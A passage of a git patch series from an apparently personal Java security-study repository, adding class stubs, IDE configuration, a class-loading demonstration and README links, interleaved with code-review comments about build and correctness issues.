From 5400bca4ce5a10e483f533482dbced08b9b81973 Mon Sep 17 00:00:00 2001 
From: 1diot9 <2868944833@qq.com> Date: Tue, 30 Sep 2025 13:22:58 +0800 Subject: [PATCH 01/16] =?UTF-8?q?pref:=20=E6=9B=B4=E6=96=B0heapdump?= =?UTF-8?q?=E5=88=A9=E7=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JDBC/PostgreSql/src/main/java/Calc.java | 4 ++ .../src/main/java/com/test/DirectConnect.java | 4 ++ JDBC/PostgreSql/src/main/java/tmp.java | 4 ++ .../src/main/java/com/test/pojo/Baka.java" | 4 ++ .../src/main/java/com/test/study/Loader.java" | 4 ++ .../RceStudy/.gitignore" | 38 +++++++++++++++++++ .../RceStudy/.idea/vcs.xml" | 4 ++ .../RceStudy/.idea/workspace.xml" | 25 ++++++++++++ .../RceStudy/pom.xml" | 21 ++++++++++ .../src/main/java/com/test/ExecFailed.java" | 4 ++ .../java/com/test/ProcessBuilderExec.java" | 4 ++ .../RceStudy/src/main/webapp/WEB-INF/web.xml" | 7 ++++ .../RceStudy/src/main/webapp/index.jsp" | 5 +++ .../src/main/webapp/processBuilder.jsp" | 16 ++++++++ .../RceStudy/src/main/webapp/runtime.jsp" | 16 ++++++++ .../RceStudy/src/main/webapp/runtime2.jsp" | 16 ++++++++ .../src/main/java/com/test/pojo/Baka.java" | 4 ++ .../com/test/study/Reflection2Runtime.java" | 4 ++ .../com/test/study/ReflectionMethods.java" | 4 ++ .../main/java/com/test/study/Ways2Class.java" | 4 ++ README.md | 6 ++- 21 files changed, 196 insertions(+), 2 deletions(-) create mode 100644 JDBC/PostgreSql/src/main/java/Calc.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java create mode 100644 JDBC/PostgreSql/src/main/java/tmp.java create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" 
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java"
create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
diff --git a/JDBC/PostgreSql/src/main/java/Calc.java b/JDBC/PostgreSql/src/main/java/Calc.java
new file mode 100644
index 0000000..457adbd
--- /dev/null
+++ b/JDBC/PostgreSql/src/main/java/Calc.java
@@ -0,0 +1,4 @@
+package PACKAGE_NAME;
+
+public class Calc {
+}
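Review bot: `package PACKAGE_NAME;` is the IntelliJ file-template placeholder, not a real package, and Calc.java sits directly under src/main/java with no matching directory, so the JDBC/PostgreSql module will fail to compile as soon as Maven builds it. Either drop the line (default package) or move the file under `com/test/` and declare `package com.test;` as DirectConnect.java in the next hunk does. tmp.java in the following hunk carries the same placeholder and the same fix applies there.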
diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java
new file mode 100644
index 0000000..2f55059
--- /dev/null
+++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java
@@ -0,0 +1,4 @@
+package com.test;
+
+public class DirectConnect {
+}
diff --git a/JDBC/PostgreSql/src/main/java/tmp.java b/JDBC/PostgreSql/src/main/java/tmp.java
new file mode 100644
index 0000000..9cd2166
--- /dev/null
+++ b/JDBC/PostgreSql/src/main/java/tmp.java
@@ -0,0 +1,4 @@
+package PACKAGE_NAME;
+
+public class tmp {
+}
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java"
new file mode 100644
index 0000000..0133f80
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java"
@@ -0,0 +1,4 @@
+package com.test.pojo;
+
+public class Baka {
+}
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java"
new file mode 100644
index 0000000..ca91bcc
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java"
@@ -0,0 +1,4 @@
+package com.test.study;
+
+public class Loader {
+}
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore"
new file mode 100644
index 0000000..5ff6309
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore"
@@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" new file mode 100644 index 0000000..d843f34 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" new file mode 100644 index 0000000..09b34af --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" @@ -0,0 +1,25 @@ + + + + + + + + + + { + "keyToString": { + "settings.editor.selected.configurable": "MavenSettings" + } +} + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" new file mode 100644 index 0000000..424e50d --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + RceStudy + war + 1.0-SNAPSHOT + RceStudy Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + RceStudy + + 
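Review bot: The new RceStudy/.gitignore lists several `.idea/` files but not `.idea/workspace.xml`, and the same commit checks that file in; workspace.xml is per-developer IDE state, and the version of it in the second patch appears to embed a machine-specific path (`jar://$PROJECT_DIR$/../../../../../../sec_software/jdks/jdk-1.8.0_65/src.zip`), which leaks local layout into a public repo and will churn on every IDE session. Add `.idea/workspace.xml`, `.idea/shelf/` and `.idea/httpRequests/` next to the other IntelliJ entries — the same set the generated `.idea/.gitignore` in the ClassLoadStudy and ReflectionStudy modules uses — and `git rm --cached` the committed copy. The `.DS_Store` entry is missing a trailing newline, which is harmless but will make the next append to this file show as a two-line diff.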
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" new file mode 100644 index 0000000..6a246db --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" @@ -0,0 +1,4 @@ +package com.test; + +public class ExecFailed { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" new file mode 100644 index 0000000..79e2065 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" @@ -0,0 +1,4 @@ +package com.test; + +public class ProcessBuilderExec { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +

Hello World!

+ + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" new file mode 100644 index 0000000..42b0a1e --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 13:04 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" new file mode 100644 index 0000000..eb37888 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 12:50 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" new file mode 100644 index 0000000..83d527d --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 12:56 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" new file mode 100644 index 0000000..0133f80 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class Baka { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" new file mode 100644 index 0000000..b09825a --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class Reflection2Runtime { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" new file mode 100644 index 0000000..8227c82 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class ReflectionMethods { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" new file mode 100644 index 0000000..66b6977 
--- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class Ways2Class { +} diff --git a/README.md b/README.md index 4bf4d31..afc5a5a 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,7 @@ - [Java基础](#Java基础) - [Java安全基础](#Java安全基础) -- [代码 / jar包调试](#代码 / jar包调试) +- [代码和jar包调试](#代码和jar包调试) - [反序列化](#反序列化) - CC链 - hessian @@ -107,7 +107,7 @@
-# 代码 / jar包调试 +# 代码 / jar包调试 一开始做ctf题的时候,遇到过很尴尬的情况,拿到jar包,不知道要怎么在本地调试。后面才学习到了反编译,远程调试等内容。 @@ -423,6 +423,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 主要是jdk自带的VisualVM看jdk版本,heapdump_tools分析依赖和密码 +[heapdump深度利用之信息泄露篇](https://mp.weixin.qq.com/s/VBCjtLxcdFvIJ0uK-sCdDw) + [Springboot信息泄露以及heapdump的利用_heapdump信息泄露-CSDN博客](https://blog.csdn.net/weixin_44309905/article/details/127279561) [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103?time__1311=eqUxuiDt5WqYqY5DsD7mPD%3DIZK7q9hGBbD&u_atoken=b94f9c93564049e1d2601ebb22a1098b&u_asig=0a472f9217433333617862864e004b) From 2509cf0872ee6c5e4dd88e851ffb27f0cac1f532 Mon Sep 17 00:00:00 2001 
From: 1diot9 <2868944833@qq.com> Date: Tue, 30 Sep 2025 13:23:38 +0800 Subject: [PATCH 02/16] =?UTF-8?q?pref:=20=E6=9B=B4=E6=96=B0Java=E5=8F=8D?= =?UTF-8?q?=E5=B0=84=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ClassLoadStudy/.gitignore" | 38 +++ .../ClassLoadStudy/.idea/.gitignore" | 8 + .../ClassLoadStudy/.idea/encodings.xml" | 7 + .../ClassLoadStudy/.idea/misc.xml" | 14 + .../ClassLoadStudy/.idea/vcs.xml" | 6 + .../ClassLoadStudy/pom.xml" | 17 ++ .../src/main/java/com/test/pojo/Baka.java" | 15 + .../src/main/java/com/test/study/Loader.java" | 13 + .../RceStudy/.idea/encodings.xml" | 7 + .../RceStudy/.idea/misc.xml" | 14 + .../RceStudy/.idea/vcs.xml" | 4 +- .../RceStudy/.idea/workspace.xml" | 256 +++++++++++++++++- .../RceStudy/pom.xml" | 10 + .../src/main/java/com/test/ExecFailed.java" | 14 + .../java/com/test/ProcessBuilderExec.java" | 7 + .../src/main/webapp/processBuilder.jsp" | 32 ++- .../RceStudy/src/main/webapp/runtime.jsp" | 30 +- .../RceStudy/src/main/webapp/runtime2.jsp" | 54 +++- .../ReflectionStudy/.gitignore" | 38 +++ .../ReflectionStudy/.idea/.gitignore" | 8 + .../ReflectionStudy/.idea/encodings.xml" | 7 + .../ReflectionStudy/.idea/misc.xml" | 14 + .../ReflectionStudy/.idea/vcs.xml" | 6 + .../ReflectionStudy/pom.xml" | 25 ++ .../src/main/java/com/test/pojo/Baka.java" | 58 ++++ .../com/test/study/Reflection2Runtime.java" | 17 ++ .../com/test/study/ReflectionMethods.java" | 80 ++++++ .../main/java/com/test/study/Ways2Class.java" | 15 + 28 files changed, 778 insertions(+), 36 deletions(-) create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" create mode 100644 
"Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" 
@@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" new file mode 100644 index 0000000..9aa651d --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" @@ -0,0 +1,17 @@ + + + 4.0.0 + + com.test + ClassLoadStudy + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" index 0133f80..e20de74 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" @@ -1,4 +1,19 @@ package com.test.pojo; public class Baka { + public String name; + + static { + System.out.println("static block"); + } + + public Baka() { + System.out.println("no-arg constructor"); + } + + public Baka(String name) { + this.name = name; + System.out.println("name constructor"); + } + } 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" index ca91bcc..1ec5f3c 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" @@ -1,4 +1,17 @@ package com.test.study; +import com.test.pojo.Baka; + public class Loader { + public static void main(String[] args) throws Exception { + Class bakaClass = Baka.class; + System.out.println("================="); + Class.forName("com.test.pojo.Baka"); // 触发static + System.out.println("=================="); + Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发 + System.out.println("================="); + Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static + System.out.println("=================="); + Baka baka = Baka.class.newInstance(); // 触发无参构造和static + } } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file 
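Review bot: The comments on the last two calls in Loader.main overstate what the program prints: a class's static initializer runs once per class loader, so by the time `Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader())` and `Baka.class.newInstance()` execute, Baka was already initialized by the earlier `Class.forName("com.test.pojo.Baka")`, and only that first call emits "static block". Suggest replacing those two comments with `// already initialized above — static block does not run again` and annotating the first line with `// class literal loads but does not initialize`. `Class.newInstance()` is deprecated since Java 9 and propagates checked exceptions from the constructor unchecked; `Baka.class.getDeclaredConstructor().newInstance()` is the current form, and the raw `Class bakaClass` (which is never used) should be `Class<Baka>` or dropped.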
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" index d843f34..c2365ab 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" @@ -1,4 +1,6 @@ - + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" index 09b34af..e70c20c 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" @@ -3,6 +3,60 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - { - "keyToString": { - "settings.editor.selected.configurable": "MavenSettings" + +}]]> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 1759207487740 + + + + + + + + + + jar://$PROJECT_DIR$/../../../../../../sec_software/jdks/jdk-1.8.0_65/src.zip!/java/lang/Runtime.java + 616 + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" index 424e50d..8f470e3 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" @@ -14,6 +14,16 @@ 3.8.1 test + + javax.servlet + javax.servlet-api + 4.0.1 + + + org.apache.commons + commons-io + 1.3.2 + RceStudy 
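Review bot: The commons-io coordinates added to RceStudy/pom.xml are wrong: `org.apache.commons:commons-io:1.3.2` is a stale artifact that was mis-published under the wrong groupId years ago and is no longer maintained; the real library is `commons-io:commons-io` (a current 2.x release), so the `<groupId>` and `<version>` lines should change accordingly. The servlet dependency (`javax.servlet:javax.servlet-api:4.0.1`) shows no `<scope>provided</scope>` in the hunk — element text may have been lost in extraction, but if it is really absent the servlet API jar gets bundled into the war and can conflict with the container's own copy at deploy time. The workspace.xml hunk above it is generated IDE state and needs no review beyond not being versioned.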
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java"
index 6a246db..4ca8034 100644
